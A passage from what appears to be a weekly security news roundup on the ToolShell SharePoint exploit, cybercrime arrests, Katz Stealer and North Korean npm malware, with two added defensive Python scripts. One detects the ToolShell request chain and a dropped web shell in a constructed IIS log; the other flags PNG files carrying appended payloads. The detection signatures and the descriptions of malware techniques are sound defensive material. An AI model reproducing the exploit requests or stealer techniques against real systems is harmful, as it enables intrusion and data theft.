Given the severity of ToolShell, organizations are strongly advised to adopt a layered defense strategy. Key recommendations include isolating on-prem SharePoint servers from public internet access to reduce exposure, enabling Antimalware Scan Interface (AMSI) in full mode to support endpoint detection, and applying Microsoft’s latest patches without delay. Detection should also be enhanced by integrating ToolShell-specific indicators of compromise (IOCs) into EDR/XDR and SIEM systems, and deploying custom rules to monitor SharePoint directories such as `LAYOUTS`.
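For the detection piece, the exploit chain leaves a simple trace in IIS logs: a POST to ToolPane.aspx, followed by requests for a freshly dropped .aspx file under LAYOUTS. The Python below is an added example for this article, not Microsoft’s, CISA’s or SentinelOne’s detection content. The log lines are constructed, the SignOut.aspx Referer check reflects public analyses of the exploit requests and is treated as an assumption here, and the web shell name list is a placeholder to be replaced with a current IOC feed.

```python
import posixpath
from typing import Dict, Iterable, List

# Web shell file names reported in public ToolShell analyses; treat as a starting point
# and replace with your vendor's current IOC list (assumption for this example).
WEBSHELL_NAMES = {"spinstall0.aspx"}


def parse_iis_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended log lines, taking column names from the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def detect_toolshell(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one hit per record that matches a ToolShell-related rule."""
    hits: List[Dict[str, str]] = []
    for i, r in enumerate(records, 1):
        stem = r.get("cs-uri-stem", "").lower()
        query = r.get("cs-uri-query", "").lower()
        referer = r.get("cs(Referer)", "").lower()
        method = r.get("cs-method", "").upper()
        base = posixpath.basename(stem)
        src = r.get("c-ip", "?")

        if method == "POST" and base == "toolpane.aspx":
            rule = "toolpane_post"
            # Assumption from public exploit analyses: DisplayMode=Edit together with a
            # Referer of /_layouts/SignOut.aspx is the signature of the unauthenticated chain.
            if "displaymode=edit" in query and referer.endswith("/_layouts/signout.aspx"):
                rule = "toolpane_post_signout_referer"
            hits.append({"record": str(i), "rule": rule, "client": src, "uri": stem})

        if "/_layouts/" in stem and base in WEBSHELL_NAMES:
            hits.append({"record": str(i), "rule": "layouts_webshell_ioc", "client": src, "uri": stem})
    return hits


# Constructed sample log (not real traffic). IIS writes spaces inside a field as '+'.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 03:12:44 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\jdoe 10.0.0.23 Mozilla/5.0+(Windows) - 200 0 0 120
2025-07-19 03:12:50 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\jdoe 10.0.0.23 Mozilla/5.0+(Windows) https://sp.corp.local/_layouts/15/start.aspx 200 0 0 210
2025-07-19 03:13:01 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0 /_layouts/SignOut.aspx 200 0 0 380
2025-07-19 03:13:05 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 45
"""


def demo() -> List[Dict[str, str]]:
    return detect_toolshell(parse_iis_w3c(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for h in demo():
        print(h)
```

The authenticated internal POST still fires the low-confidence rule (an admin editing a web part page looks the same on the wire), while the unauthenticated request from 203.0.113.7 with the SignOut.aspx Referer and the follow-up fetch of the dropped file are the pair worth paging on.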

CISA is continuing to coordinate with Microsoft, federal agencies, and local partners to assess the full scope of impact. So far, approximately 400 organizations, including government agencies, have reportedly been compromised, pointing to the urgent need for rapid mitigation.

The Good, the Bad and the Ugly in Cybersecurity – Week 29

The Good | Cybercriminals Face Disruptions Across Ransom, DDoS & Extortion Campaigns

Cameron John Wagenius, a 21-year-old former U.S. Army soldier, has pleaded guilty to hacking and extorting at least ten U.S. telecom and tech companies, including AT&T and Verizon. Operating under aliases like “kiberphant0m” and “cyb3rph4nt0m”, he used tools like SSH Brute and SIM-swapping techniques to steal credentials and demanded ransoms of up to $1 million from the breached firms.

Source: KrebsOnSecurity/Facebook

Active on forums such as BreachForums and XSS, Wagenius conspired with other actors between 2023 and 2024, including in the Snowflake data-theft attacks, part of it while still serving in the military. In one instance, he threatened to leak over 358GB of stolen data and, in another, sought $500,000 in cryptocurrency from a victim company. Wagenius was arrested in December 2024 and indicted this week; he now faces up to 27 years in prison, with sentencing scheduled for October 6.

Europol-led “Operation Elicius” has dismantled a Romanian-based ransomware gang called “Diskstation” that recently targeted Synology Network-Attached Storage (NAS) devices, encrypting data and disrupting businesses, including NGOs and media firms, in Italy’s Lombardy region. The group, active since 2021 under multiple aliases, demanded ransoms from $10,000 to hundreds of thousands in cryptocurrency. One man, suspected to be the primary operator of the attacks, was also arrested in Bucharest following international raids.

In another global operation dubbed “Eastwood”, law enforcement came together to target pro-Russian hacktivist group “NoName057(16)”, responsible for widespread DDoS attacks across Europe, Israel, and Ukraine. As part of the collaborative effort, authorities seized over 100 servers, issued seven arrest warrants, and detained two suspects. The operation was successful in disrupting the group’s infrastructure, but key members remain in Russia, and future attacks on European entities by the gang are still expected to persist.

The Bad | Katz Stealer MaaS Gains Traction, Stealing Sensitive Info Via Multi-Stage Infection Chains

A new report from SentinelLABS this week breaks down Katz Stealer, a sophisticated infostealer operating as Malware-as-a-Service (MaaS), launched in early 2025 and widely adopted by cybercriminals due to its ease of use, customizable features, and powerful capabilities. Marketed on Telegram, Discord, and web forums, it offers a web-based panel for affiliates to create custom payloads, manage stolen data, and configure attacks.

Katz Stealer v0.1 advertisement on Breachforums (April 2025)

Katz employs a stealthy multi-stage infection chain that begins with phishing emails or trojanized downloads. A JavaScript dropper launches PowerShell commands to retrieve a steganographically embedded payload from a decoy image. It uses UAC bypasses, process hollowing, and scheduled tasks to achieve persistence and execute with elevated privileges, often hiding in legitimate processes like MSBuild.exe.
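Both this infection chain and MucorAgent (above) fetch a payload hidden in what looks like an ordinary image. A quick triage check for the simplest forms of that trick, data appended after the PNG IEND chunk or stuffed into an oversized ancillary chunk, is the Python below. It is an added example for this article and is not Katz Stealer’s, MucorAgent’s or any vendor’s code; the 1x1 PNG it inspects is generated in the script, the appended payload is random bytes standing in for an encrypted blob, and the exact embedding used by either malware family (which the summary above does not detail) is not modelled.

```python
import math
import struct
import zlib
from collections import Counter
from typing import Dict

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted/compressed data, lower for text or code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect_png(blob: bytes, max_ancillary: int = 4096) -> Dict:
    """Walk the chunk list, verify CRCs, and report data after IEND or oversized ancillary chunks."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG signature")
    pos, chunks, bad_crc, oversized = len(PNG_SIG), [], [], []
    trailer = b""
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc) < 4:
            break  # truncated chunk
        name = ctype.decode("latin-1")
        chunks.append((name, length))
        if struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF) != crc:
            bad_crc.append(name)
        # ancillary chunks have a lower-case first letter (tEXt, zTXt, iTXt, private types)
        if name[0].islower() and length > max_ancillary:
            oversized.append((name, length))
        pos += 12 + length
        if name == "IEND":
            trailer = blob[pos:]  # anything after IEND is not part of the image
            break
    return {
        "chunks": chunks,
        "bad_crc": bad_crc,
        "oversized_ancillary": oversized,
        "trailing_bytes": len(trailer),
        "trailing_entropy": round(shannon_entropy(trailer), 2),
        "suspicious": bool(trailer or bad_crc or oversized),
    }


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 greyscale PNG, built here so the example runs offline."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x00")                      # filter byte + one grey pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def decoy_with_payload(payload: bytes) -> bytes:
    """Mimic the trick described above: a real image with an opaque blob appended after IEND."""
    return minimal_png() + payload


if __name__ == "__main__":
    import os
    print(inspect_png(minimal_png()))
    print(inspect_png(decoy_with_payload(os.urandom(2048))))  # stand-in for an encrypted payload
```

A clean image has no trailer and all CRCs verify; a decoy carrying an encrypted payload shows a high-entropy trailer of roughly the payload’s size, which is the cue to carve those bytes and hand them to the analyst rather than to the image viewer.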

Once active, Katz Stealer focuses on harvesting data from browsers, messaging platforms, gaming services, email clients, VPNs, and cryptocurrency wallets. It bypasses modern browser protections such as Google’s Application Bound Encryption (ABE) by extracting master decryption keys and decrypting sensitive data in memory.

The malware also targets wallet extensions, clipboard data, and system files, sending stolen information back to hardcoded command-and-control (C2) servers via HTTP. The C2 infrastructure is IP-based, and Katz maintains persistence for ongoing data exfiltration. Attackers can also remotely wipe traces after data theft is complete.

Despite its advanced capabilities, Katz Stealer still relies heavily on user interaction, making training and awareness on social engineering and detection critical for prevention. SentinelOne Singularity detects and blocks Katz Stealer through real-time analysis of malicious behaviors, process injections, and network activity, ensuring systems remain protected from this evolving infostealer threat.

The Ugly | DPRK-Based Actors Expand On Contagious Interview npm Malware Campaign

North Korean threat actors behind the ongoing Contagious Interview campaign have published 67 new malicious packages to the npm registry, continuing their efforts to compromise the software supply chain. Cyber researchers observed that these packages – downloaded over 17,000 times – feature a new malware loader dubbed “XORIndex”, which builds on earlier campaigns distributing another loader called HexEval.

Chain of events when a victim downloads and installs the npm-based package (Source: Palo Alto Networks)

Contagious Interview is known for targeting software developers through fake coding assignments or poisoned open-source packages. The goal is to infect machines and extract sensitive data, particularly from developers at organizations of interest. This campaign aligns with North Korea’s broader strategy of exploiting remote IT roles to gain unauthorized access to global networks.

These npm packages serve as initial access vectors for BeaverTail, a JavaScript-based infostealer that targets web browsers and cryptocurrency wallets, and may also deploy the Python backdoor InvisibleFerret. XORIndex, like HexEval, profiles the victim’s machine and communicates with hardcoded C2 servers to exfiltrate system information and launch follow-on payloads.

Researchers observed that XORIndex has evolved from a simple loader into a more advanced tool with basic system reconnaissance capabilities. Meanwhile, attackers are rotating aliases and package names to evade detection, creating a “whack-a-mole” scenario for defenders.

The campaign continues to rotate npm maintainer aliases and reuse core malware components, making detection difficult. XORIndex alone has seen over 9,000 downloads since June 2025. Despite ongoing takedown efforts, the attackers adapt quickly with new variants, deploying the malware through a consistent playbook with small variations that lets them keep a foothold in the registry, which highlights the growing need for vigilance across developer ecosystems.
